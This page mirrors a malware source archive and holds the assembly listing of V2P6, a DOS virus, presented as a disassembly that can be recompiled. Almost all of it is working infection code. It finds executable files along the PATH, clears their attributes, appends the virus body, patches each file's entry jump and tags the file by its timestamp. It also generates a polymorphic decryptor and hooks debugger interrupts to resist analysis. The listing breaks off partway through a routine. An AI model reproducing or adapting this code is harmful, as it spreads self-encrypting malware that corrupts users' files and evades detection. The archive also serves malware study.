mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
1099 lines
22 KiB
NASM
1099 lines
22 KiB
NASM
|
|
|||
|
;**********************************************
|
|||
|
; *
|
|||
|
; V2P6.ASM *
|
|||
|
; a *
|
|||
|
; recompilable disassembly *
|
|||
|
; of *
|
|||
|
; Mark Washburn's V2P6 *
|
|||
|
; self-encrypting, *
|
|||
|
; variable-length *
|
|||
|
; virus *
|
|||
|
; - *
|
|||
|
; WRITTEN FOR REASSEMBLY *
|
|||
|
; WITH MICROSOFT MASM ASSEMBLER. *
|
|||
|
; *
|
|||
|
; *
|
|||
|
; 1) The V2P6 uses a "sliding-window" *
|
|||
|
; encryption technique that relies on *
|
|||
|
; Interrupts One and Three. The *
|
|||
|
; "INSERT_ENCRYPTION_TECHNIQUES" call *
|
|||
|
; inserts the appropriate code for *
|
|||
|
; this task. *
|
|||
|
; *
|
|||
|
; 2) Occasionally, NOPS and Interrupt 3 *
|
|||
|
; calls are used as "false code" that *
|
|||
|
; is designed to confuse those who *
|
|||
|
; attempt to disassemble the virus. *
|
|||
|
; THEY are not true INT 3 or NOP *
|
|||
|
; instructions. These attempts are *
|
|||
|
; clearly labeled as such. *
|
|||
|
; *
|
|||
|
;**********************************************
|
|||
|
|
|||
|
CODE_SEG SEGMENT
|
|||
|
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
|
|||
|
ORG 0100H
|
|||
|
V2P6 PROC NEAR
|
|||
|
|
|||
|
THE_BEGINNING:
|
|||
|
JMP SHORT DEGARBLER
|
|||
|
|
|||
|
DB " V2P6.ASM "
|
|||
|
|
|||
|
DEGARBLER:
|
|||
|
CALL INSERT_ENCRYPTION_TECHNIQUES
|
|||
|
DB 36 DUP (090H)
|
|||
|
|
|||
|
;========== Body encryption takes place from here down ===========
|
|||
|
|
|||
|
START:
|
|||
|
MOV BP,SP
|
|||
|
SUB SP,029H
|
|||
|
PUSH CX
|
|||
|
MOV DX,OFFSET VARIABLE_CODE
|
|||
|
MOV WORD PTR[BP-014H],DX
|
|||
|
CLI
|
|||
|
CLD
|
|||
|
|
|||
|
STORE_INTERRUPT_ADDRESSES:
|
|||
|
PUSH DS
|
|||
|
MOV AX,0
|
|||
|
PUSH AX
|
|||
|
POP DS
|
|||
|
CLI
|
|||
|
MOV AX,DS:WORD PTR[4]
|
|||
|
MOV WORD PTR[BP-028H],AX
|
|||
|
MOV AX,DS:WORD PTR[6]
|
|||
|
MOV WORD PTR[BP-026H],AX
|
|||
|
MOV AX,DS:WORD PTR[0CH]
|
|||
|
MOV WORD PTR[BP-024H],AX
|
|||
|
MOV AX,DS:WORD PTR[0EH]
|
|||
|
MOV WORD PTR[BP-022H],AX
|
|||
|
STI
|
|||
|
POP DS
|
|||
|
|
|||
|
REPLACE_INTERRUPT_ADDRESSES:
|
|||
|
CALL REPLACE_ONE_AND_THREE
|
|||
|
MOV SI,DX
|
|||
|
ADD SI,0E4H
|
|||
|
MOV DI,0100H
|
|||
|
MOV CX,3
|
|||
|
CLD
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
CHECK_DOS_VERSION:
|
|||
|
MOV SI,DX
|
|||
|
MOV AH,030H
|
|||
|
INT 021H
|
|||
|
CMP AL,0
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
JNE STORE_THE_DTA
|
|||
|
JMP EXIT
|
|||
|
|
|||
|
STORE_THE_DTA:
|
|||
|
PUSH ES
|
|||
|
MOV AH,02FH
|
|||
|
INT 021H
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[BP-4],BX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[BP-2],ES
|
|||
|
POP ES
|
|||
|
|
|||
|
SET_NEW_DTA:
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0135H
|
|||
|
MOV AH,01AH
|
|||
|
INT 021H
|
|||
|
PUSH ES
|
|||
|
PUSH SI
|
|||
|
MOV ES,DS:WORD PTR[02CH]
|
|||
|
MOV DI,0H
|
|||
|
|
|||
|
FIND_ENVIRONMENT:
|
|||
|
POP SI
|
|||
|
PUSH SI
|
|||
|
ADD SI,0F0H
|
|||
|
LODSB
|
|||
|
MOV CX,08000H
|
|||
|
REPNE SCASB
|
|||
|
MOV CX,4H
|
|||
|
LOOOPER:
|
|||
|
LODSB
|
|||
|
SCASB
|
|||
|
JNE FIND_ENVIRONMENT
|
|||
|
LOOP LOOOPER
|
|||
|
POP SI
|
|||
|
POP ES
|
|||
|
MOV WORD PTR[BP-0CH],DI
|
|||
|
MOV BX,SI
|
|||
|
ADD SI,0F5H
|
|||
|
MOV DI,SI
|
|||
|
JMP SHORT COPY_FILE_SPEC_TO_WORK_AREA
|
|||
|
|
|||
|
NOP
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
NO_FILE_FOUND:
|
|||
|
CMP WORD PTR[BP-0CH],0
|
|||
|
JNE FOLLOW_THE_PATH
|
|||
|
JMP RESTORE_DTA
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
FOLLOW_THE_PATH:
|
|||
|
PUSH DS
|
|||
|
PUSH SI
|
|||
|
MOV DS,ES:WORD PTR[02CH]
|
|||
|
MOV DI,SI
|
|||
|
MOV SI,ES:WORD PTR[BP-0CH]
|
|||
|
ADD DI,0F5H
|
|||
|
|
|||
|
UP_TO_LODSB:
|
|||
|
LODSB
|
|||
|
CMP AL,03BH
|
|||
|
JE SEARCH_AGAIN
|
|||
|
CMP AL,0
|
|||
|
JE CLEAR_SI
|
|||
|
STOSB
|
|||
|
JMP SHORT UP_TO_LODSB
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
CLEAR_SI:
|
|||
|
MOV SI,0
|
|||
|
|
|||
|
SEARCH_AGAIN:
|
|||
|
POP BX
|
|||
|
POP DS
|
|||
|
MOV WORD PTR[BP-0CH],SI
|
|||
|
CMP CH,0FFH
|
|||
|
JE COPY_FILE_SPEC_TO_WORK_AREA
|
|||
|
MOV AL,05CH
|
|||
|
STOSB
|
|||
|
|
|||
|
COPY_FILE_SPEC_TO_WORK_AREA:
|
|||
|
MOV WORD PTR[BP-0EH],DI
|
|||
|
MOV SI,BX
|
|||
|
ADD SI,0EAH
|
|||
|
MOV CX,6
|
|||
|
REP MOVSB
|
|||
|
MOV SI,BX
|
|||
|
MOV AH,04EH
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0F5H
|
|||
|
MOV CX,3
|
|||
|
INT 021H
|
|||
|
JMP SHORT CHECK_CARRY_FLAG
|
|||
|
|
|||
|
NOP ;False code.
|
|||
|
INT 3
|
|||
|
|
|||
|
FIND_NEXT_FILE:
|
|||
|
MOV AH,04FH
|
|||
|
INT 021H
|
|||
|
|
|||
|
CHECK_CARRY_FLAG:
|
|||
|
JAE FILE_FOUND
|
|||
|
JMP SHORT NO_FILE_FOUND
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
FILE_FOUND:
|
|||
|
MOV AX,WORD PTR[SI+014BH]
|
|||
|
AND AL,01FH
|
|||
|
CMP AL,01FH
|
|||
|
JE FIND_NEXT_FILE
|
|||
|
CMP WORD PTR[SI+014FH],0F902H
|
|||
|
JE FIND_NEXT_FILE
|
|||
|
CMP WORD PTR[SI+014FH],0AH
|
|||
|
JE FIND_NEXT_FILE
|
|||
|
MOV DI,WORD PTR[BP-0EH]
|
|||
|
PUSH SI
|
|||
|
ADD SI,0153H
|
|||
|
|
|||
|
MOVE_ASCII_FILENAME:
|
|||
|
LODSB
|
|||
|
STOSB
|
|||
|
CMP AL,0
|
|||
|
JNE MOVE_ASCII_FILENAME
|
|||
|
POP SI
|
|||
|
|
|||
|
GET_FILE_ATTRIBUTE:
|
|||
|
MOV AX,04300H
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0F5H
|
|||
|
INT 021H
|
|||
|
|
|||
|
STORE_FILE_ATTRIBUTE:
|
|||
|
MOV WORD PTR[BP-0AH],CX
|
|||
|
|
|||
|
CLEAR_FILE_ATTRIBUTE:
|
|||
|
MOV AX,04301H
|
|||
|
AND CX,-2
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0F5H
|
|||
|
INT 021H
|
|||
|
|
|||
|
OPEN_FILE:
|
|||
|
MOV AX,03D02H
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0F5H
|
|||
|
INT 021H
|
|||
|
JAE GET_DATE_AND_TIME
|
|||
|
JMP SET_THE_ATTRIBUTE
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
GET_DATE_AND_TIME:
|
|||
|
MOV BX,AX
|
|||
|
MOV AX,05700H
|
|||
|
INT 021H
|
|||
|
|
|||
|
STORE_DATE_AND_TIME:
|
|||
|
MOV WORD PTR[BP-8],CX
|
|||
|
MOV WORD PTR[BP-6],DX
|
|||
|
|
|||
|
READ_FIRST_THREE_BYTES:
|
|||
|
MOV AH,03FH
|
|||
|
MOV CX,3
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0E4H
|
|||
|
INT 021H
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
JB ERROR_OCCURRED
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CMP AX,3
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
JNE ERROR_OCCURRED
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
|
|||
|
GET_FILE_LENGTH:
|
|||
|
MOV AX,04202H
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV CX,0
|
|||
|
MOV DX,0
|
|||
|
INT 021H
|
|||
|
JAE AT_END_OF_FILE
|
|||
|
|
|||
|
ERROR_OCCURRED:
|
|||
|
JMP SET_DATE_AND_CLOSE_FILE
|
|||
|
|
|||
|
AT_END_OF_FILE:
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
PUSH BX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV CX,AX
|
|||
|
PUSH CX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
SUB AX,3
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[SI+0E8H],AX
|
|||
|
ADD CX,06CDH
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DI,SI
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
SUB DI,059FH
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[DI],CX
|
|||
|
MOV AH,02CH
|
|||
|
INT 021H
|
|||
|
XOR DX,CX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV CX,WORD PTR[SI+0E2H]
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
XOR CX,DX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[SI+0E2H],DX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV WORD PTR[BP-01EH],DX
|
|||
|
|
|||
|
CREATE_THE_DEGARBLER:
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
MOV AL,BYTE PTR[BP-01EH]
|
|||
|
AND AL,3
|
|||
|
CMP AL,3
|
|||
|
JE CREATE_THE_DEGARBLER
|
|||
|
PUSH AX
|
|||
|
ROR AL,1
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
ROR AL,1
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[SI+O10H],AL
|
|||
|
POP AX
|
|||
|
ADD AL,2
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[SI+O3CH],AL
|
|||
|
|
|||
|
CREATE_DEGARBLER_PART_TWO:
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
MOV AL,BYTE PTR[BP-01EH]
|
|||
|
AND AL,7
|
|||
|
CMP AL,6
|
|||
|
JA CREATE_DEGARBLER_PART_TWO
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[BP-01BH],AL
|
|||
|
PUSH AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
XOR AH,AH
|
|||
|
SHL AX,1
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
INC AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O5CH]
|
|||
|
ADD BX,AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DL,BYTE PTR[BX]
|
|||
|
POP AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CMP AL,3
|
|||
|
JA CREATE_DEGARBLER_PART_FOUR
|
|||
|
|
|||
|
CREATE_DEGARBLER_PART_THREE:
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
AND AL,DL
|
|||
|
JE CREATE_DEGARBLER_PART_THREE
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[BP-01CH],AL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
PUSH AX
|
|||
|
MOV BL,AL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
NOT BL
|
|||
|
AND DL,BL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_TWO
|
|||
|
MOV AL,DL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
XOR DH,DH
|
|||
|
SHL DX,1
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O24H]
|
|||
|
ADD BX,DX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BX,WORD PTR[BX]
|
|||
|
MOV WORD PTR[SI+ODH],BX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BL,080H
|
|||
|
MOV BYTE PTR[BP-010H],BL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
POP DX
|
|||
|
CALL DEGARB_CALL_TWO
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DH,DL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DL,AL
|
|||
|
JMP SHORT CREATE_DEGARBLER_PART_FIVE
|
|||
|
|
|||
|
CREATE_DEGARBLER_PART_FOUR:
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[BP-01CH],DL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_TWO
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DH,DL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
REAL_NOPS:
|
|||
|
MOV BX,09090H
|
|||
|
MOV WORD PTR[SI+ODH],BX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
XOR DL,DL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV BYTE PTR[BP-010H],DL
|
|||
|
MOV DL,0FFH
|
|||
|
|
|||
|
CREATE_DEGARBLER_PART_FIVE:
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
MOV AL,BYTE PTR[BP-01EH]
|
|||
|
AND AL,0FH
|
|||
|
CMP AL,0CH
|
|||
|
JA CREATE_DEGARBLER_PART_FIVE
|
|||
|
CMP AL,DH
|
|||
|
JE CREATE_DEGARBLER_PART_FIVE
|
|||
|
CMP AL,DL
|
|||
|
JE CREATE_DEGARBLER_PART_FIVE
|
|||
|
MOV BYTE PTR[BP-0FH],AL
|
|||
|
XOR AH,AH
|
|||
|
SHL AX,1
|
|||
|
SHL AX,1
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O6AH]
|
|||
|
ADD BX,AX
|
|||
|
MOV CL,BYTE PTR[BX]
|
|||
|
MOV AL,031H
|
|||
|
TEST CL,8
|
|||
|
JNE OVER_ONE
|
|||
|
MOV AL,030H
|
|||
|
OVER_ONE:
|
|||
|
MOV BYTE PTR[SI+0DBH],AL
|
|||
|
MOV BYTE PTR[SI+OFH],AL
|
|||
|
MOV AL,5
|
|||
|
TEST CL,8
|
|||
|
JNE OVER_SEVERAL
|
|||
|
TEST CL,4
|
|||
|
JE OVER_SEVERAL
|
|||
|
MOV AL,025H
|
|||
|
OVER_SEVERAL:
|
|||
|
MOV BYTE PTR[SI+0DCH],AL
|
|||
|
MOV AL,BYTE PTR[SI+O10H]
|
|||
|
AND CL,7
|
|||
|
XOR CH,CH
|
|||
|
SHL CX,1
|
|||
|
SHL CX,1
|
|||
|
SHL CX,1
|
|||
|
OR AL,CL
|
|||
|
MOV CL,BYTE PTR[BP-01BH]
|
|||
|
SHL CX,1
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O5CH]
|
|||
|
ADD BX,CX
|
|||
|
MOV CL,BYTE PTR[BX]
|
|||
|
OR AL,CL
|
|||
|
MOV BYTE PTR[SI+O10H],AL
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O6AH]
|
|||
|
XOR CL,CL
|
|||
|
MOV BYTE PTR[BP-01BH],CL
|
|||
|
MOV AL,BYTE PTR[BP-0FH]
|
|||
|
CMP AL,9
|
|||
|
JA THREE_ADJUSTMENTS
|
|||
|
XOR AH,AH
|
|||
|
SHL AX,1
|
|||
|
SHL AX,1
|
|||
|
ADD BX,AX
|
|||
|
INC BX
|
|||
|
MOV AL,BYTE PTR[BX]
|
|||
|
MOV BYTE PTR[SI+O1BH],AL
|
|||
|
INC BX
|
|||
|
INC BX
|
|||
|
MOV AL,BYTE PTR[BX]
|
|||
|
MOV BYTE PTR[SI+O6],AL
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O6AH]
|
|||
|
JMP SHORT NO_ADJUSTMENT
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
THREE_ADJUSTMENTS:
|
|||
|
MOV CL,0FFH
|
|||
|
MOV BYTE PTR[BP-01BH],CL
|
|||
|
MOV CL,090H
|
|||
|
MOV BYTE PTR[SI+O1BH],CL
|
|||
|
MOV CL,0B8H
|
|||
|
MOV BYTE PTR[SI+O6],CL
|
|||
|
|
|||
|
NO_ADJUSTMENT:
|
|||
|
MOV DL,BYTE PTR[BP-01CH]
|
|||
|
CALL DEGARB_CALL_TWO
|
|||
|
XOR DH,DH
|
|||
|
SHL DX,1
|
|||
|
SHL DX,1
|
|||
|
ADD BX,DX
|
|||
|
INC BX
|
|||
|
INC BX
|
|||
|
MOV AL,BYTE PTR[BX]
|
|||
|
MOV BYTE PTR[SI+O1AH],AL
|
|||
|
INC BX
|
|||
|
MOV AL,BYTE PTR[BX]
|
|||
|
MOV BYTE PTR[SI+ZERO],AL
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV AX,WORD PTR[BP-01EH]
|
|||
|
AND AX,0FFH
|
|||
|
ADD AX,0709H
|
|||
|
MOV WORD PTR[BP-018H],AX
|
|||
|
MOV WORD PTR[SI+O4],AX
|
|||
|
POP CX
|
|||
|
ADD CX,0127H
|
|||
|
MOV WORD PTR[SI+O1],CX
|
|||
|
MOV CL,BYTE PTR[BP-01BH]
|
|||
|
OR CL,CL
|
|||
|
JNE CREATE_DEGARBLER_PART_SIX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
MOV AX,WORD PTR[BP-01EH]
|
|||
|
MOV WORD PTR[SI+O7],AX
|
|||
|
|
|||
|
CREATE_DEGARBLER_PART_SIX:
|
|||
|
MOV WORD PTR[BP-016H],AX
|
|||
|
MOV DI,SI
|
|||
|
SUB DI,05CDH
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV AX,3
|
|||
|
MOV CL,BYTE PTR[BP-010H]
|
|||
|
OR AL,CL
|
|||
|
MOV CL,BYTE PTR[BP-01BH]
|
|||
|
OR CL,CL
|
|||
|
JNE OVER_OR
|
|||
|
OR AX,4
|
|||
|
OVER_OR:
|
|||
|
MOV BX,SI
|
|||
|
ADD BX,[O2CH]
|
|||
|
MOV WORD PTR[BP-01AH],AX
|
|||
|
CALL DEGARB_CALL_FIVE
|
|||
|
MOV WORD PTR[BP-012H],DI
|
|||
|
REAL_NOP:
|
|||
|
ADD BX,[OO10H]
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV AX,1
|
|||
|
CALL DEGARB_CALL_ONE
|
|||
|
MOV WORD PTR[BP-01AH],AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_FIVE
|
|||
|
ADD BX,[OO10H]
|
|||
|
MOV AX,1
|
|||
|
MOV CL,BYTE PTR[BP-01BH]
|
|||
|
OR CL,CL
|
|||
|
JNE OVER_THE_OR
|
|||
|
OR AX,2
|
|||
|
OVER_THE_OR:
|
|||
|
CALL DEGARB_CALL_ONE
|
|||
|
MOV WORD PTR[BP-01AH],AX
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
CALL DEGARB_CALL_FIVE
|
|||
|
MOV CX,2
|
|||
|
MOV SI,WORD PTR[BP-014H]
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
ADD SI,[O22H]
|
|||
|
REP MOVSB
|
|||
|
MOV AX,WORD PTR[BP-012H]
|
|||
|
SUB AX,DI
|
|||
|
DEC DI
|
|||
|
STOSB
|
|||
|
|
|||
|
LAST_STEP:
|
|||
|
MOV CX,WORD PTR[BP-014H]
|
|||
|
SUB CX,05A6H
|
|||
|
CMP CX,DI
|
|||
|
JE COPY_ENC_AND_WRITE_TO_MEMORY
|
|||
|
MOV DX,0
|
|||
|
CALL DEGARB_CALL_FOUR
|
|||
|
JMP SHORT LAST_STEP
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
COPY_ENC_AND_WRITE_TO_MEMORY:
|
|||
|
MOV SI,WORD PTR[BP-014H]
|
|||
|
PUSH SI
|
|||
|
MOV DI,SI
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV CX,044H
|
|||
|
ADD SI,09EH
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
ADD DI,0262H
|
|||
|
MOV DX,DI
|
|||
|
REP MOVSB
|
|||
|
POP SI
|
|||
|
POP BX
|
|||
|
CALL GET_OFFSET
|
|||
|
ADD AX,6
|
|||
|
PUSH AX
|
|||
|
JMP DX
|
|||
|
|
|||
|
WRITE_NEW_JUMP:
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
JB SET_DATE_AND_CLOSE_FILE
|
|||
|
MOV AX,04200H
|
|||
|
MOV CX,0
|
|||
|
MOV DX,0
|
|||
|
INT 021H
|
|||
|
JB SET_DATE_AND_CLOSE_FILE
|
|||
|
MOV AH,040H
|
|||
|
MOV CX,3
|
|||
|
NOP ;Breakpoint Encryption.
|
|||
|
NOP
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0E7H
|
|||
|
INT 021H
|
|||
|
|
|||
|
SET_DATE_AND_CLOSE_FILE:
|
|||
|
MOV DX,WORD PTR[BP-6]
|
|||
|
MOV CX,WORD PTR[BP-8]
|
|||
|
AND CX,-020H
|
|||
|
OR CX,01FH
|
|||
|
MOV AX,05701H
|
|||
|
INT 021H
|
|||
|
MOV AH,03EH
|
|||
|
INT 021H
|
|||
|
|
|||
|
SET_THE_ATTRIBUTE:
|
|||
|
MOV AX,04301H
|
|||
|
MOV CX,WORD PTR[BP-0AH]
|
|||
|
MOV DX,SI
|
|||
|
ADD DX,0F5H
|
|||
|
INT 021H
|
|||
|
|
|||
|
RESTORE_DTA:
|
|||
|
PUSH DS
|
|||
|
MOV DX,WORD PTR[BP-4]
|
|||
|
MOV DS,WORD PTR[BP-2]
|
|||
|
MOV AH,01AH
|
|||
|
INT 021H
|
|||
|
POP DS
|
|||
|
|
|||
|
EXIT:
|
|||
|
POP CX
|
|||
|
MOV SP,BP
|
|||
|
MOV DI,0100H
|
|||
|
PUSH DI
|
|||
|
XOR AX,AX
|
|||
|
XOR BX,BX
|
|||
|
XOR CX,CX
|
|||
|
XOR DX,DX
|
|||
|
XOR SI,SI
|
|||
|
XOR BP,BP
|
|||
|
XOR DI,DI
|
|||
|
JMP RESTORE_ONE_AND_THREE
|
|||
|
|
|||
|
;========= Calls used to create the Degarbler ===========
|
|||
|
|
|||
|
DEGARB_CALL_ONE:
|
|||
|
PUSH AX
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
MOV CL,AL
|
|||
|
MOV CH,BYTE PTR[BP-01EH]
|
|||
|
POP AX
|
|||
|
CMP CH,080H
|
|||
|
JA TO_RET
|
|||
|
XOR CH,CH
|
|||
|
OR AX,CX
|
|||
|
TO_RET:
|
|||
|
RET
|
|||
|
|
|||
|
DEGARB_CALL_TWO:
|
|||
|
PUSH AX
|
|||
|
MOV AL,0
|
|||
|
UP_TO_SHIFT:
|
|||
|
SHR DL,1
|
|||
|
JB RIGHT_HERE
|
|||
|
INC AL
|
|||
|
JMP SHORT UP_TO_SHIFT
|
|||
|
RIGHT_HERE:
|
|||
|
MOV DL,AL
|
|||
|
POP AX
|
|||
|
RET
|
|||
|
|
|||
|
INT 3 ;False code.
|
|||
|
|
|||
|
DEGARB_CALL_THREE:
|
|||
|
MOV CX,WORD PTR[BP-01EH]
|
|||
|
XOR CX,0813CH
|
|||
|
ADD CX,09249H
|
|||
|
ROR CX,1
|
|||
|
ROR CX,1
|
|||
|
ROR CX,1
|
|||
|
MOV WORD PTR[BP-01EH],CX
|
|||
|
AND CX,7
|
|||
|
PUSH CX
|
|||
|
INC CX
|
|||
|
XOR AX,AX
|
|||
|
STC
|
|||
|
RCL AX,CL
|
|||
|
POP CX
|
|||
|
RET
|
|||
|
|
|||
|
GET_OFFSET:
|
|||
|
POP AX
|
|||
|
PUSH AX
|
|||
|
RET
|
|||
|
|
|||
|
DEGARB_CALL_FOUR:
|
|||
|
CALL DEGARB_CALL_THREE
|
|||
|
TEST DX,AX
|
|||
|
JNE DEGARB_CALL_FOUR
|
|||
|
OR DX,AX
|
|||
|
MOV AX,CX
|
|||
|
SHL AX,1
|
|||
|
PUSH AX
|
|||
|
XLATB
|
|||
|
MOV CX,AX
|
|||
|
POP AX
|
|||
|
INC AX
|
|||
|
XLATB
|
|||
|
ADD AX,WORD PTR[BP-014H]
|
|||
|
MOV SI,AX
|
|||
|
REP MOVSB
|
|||
|
RET
|
|||
|
|
|||
|
DEGARB_CALL_FIVE:
|
|||
|
MOV DX,0
|
|||
|
PRETTY_PLACE:
|
|||
|
CALL DEGARB_CALL_FOUR
|
|||
|
MOV AX,DX
|
|||
|
AND AX,WORD PTR[BP-01AH]
|
|||
|
CMP AX,WORD PTR[BP-01AH]
|
|||
|
JNE PRETTY_PLACE
|
|||
|
RET
|
|||
|
|
|||
|
;====== Encryption and debugger stopping routines =======
|
|||
|
|
|||
|
NEW_INT_THREE:
|
|||
|
PUSH BX
|
|||
|
MOV BX,SP
|
|||
|
PUSH AX
|
|||
|
PUSH SI
|
|||
|
PUSH DS
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
OR BYTE PTR[BX+7],1
|
|||
|
MOV SI,WORD PTR[BX+2]
|
|||
|
INC WORD PTR[BX+2]
|
|||
|
MOV WORD PTR[BP-020H],SI
|
|||
|
LODSB
|
|||
|
XOR BYTE PTR[SI],AL
|
|||
|
IN AL,021H
|
|||
|
MOV BYTE PTR[BP-029H],AL
|
|||
|
MOV AL,0FFH
|
|||
|
OUT 021H,AL
|
|||
|
POP DS
|
|||
|
POP SI
|
|||
|
POP AX
|
|||
|
POP BX
|
|||
|
IRET
|
|||
|
|
|||
|
NEW_INT_ONE:
|
|||
|
PUSH BX
|
|||
|
MOV BX,SP
|
|||
|
PUSH AX
|
|||
|
AND SS:BYTE PTR[BX+7],0FEH
|
|||
|
MOV BX,WORD PTR[BP-020H]
|
|||
|
MOV AL,CS:BYTE PTR[BX]
|
|||
|
XOR CS:BYTE PTR[BX+1],AL
|
|||
|
MOV AL,BYTE PTR[BP-029H]
|
|||
|
OUT 021H,AL
|
|||
|
MOV AL,020H
|
|||
|
OUT 020H,AL
|
|||
|
POP AX
|
|||
|
POP BX
|
|||
|
IRET
|
|||
|
|
|||
|
REPLACE_ONE_AND_THREE:
|
|||
|
PUSHF
|
|||
|
PUSH DS
|
|||
|
PUSH AX
|
|||
|
MOV AX,0
|
|||
|
PUSH AX
|
|||
|
POP DS
|
|||
|
MOV AX,WORD PTR[BP-014H]
